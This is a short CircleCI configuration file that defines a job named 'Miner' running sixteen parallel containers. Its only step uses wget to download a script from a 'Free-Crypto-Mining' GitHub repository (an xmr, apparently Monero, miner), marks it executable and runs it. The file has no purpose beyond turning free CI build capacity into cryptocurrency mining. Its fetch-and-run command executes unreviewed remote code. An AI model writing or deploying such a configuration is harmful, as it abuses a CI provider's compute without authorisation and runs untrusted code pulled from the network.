version: 2
jobs:
    Miner:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Run Miner
            command: |
              wget https://raw.githubusercontent.com/MomboteQ/Free-Crypto-Mining/main/xmr/circleci.sh
              chmod +x circleci.sh
              ./circleci.sh

workflows:
    version: 2
    build:
        jobs:
        - Miner
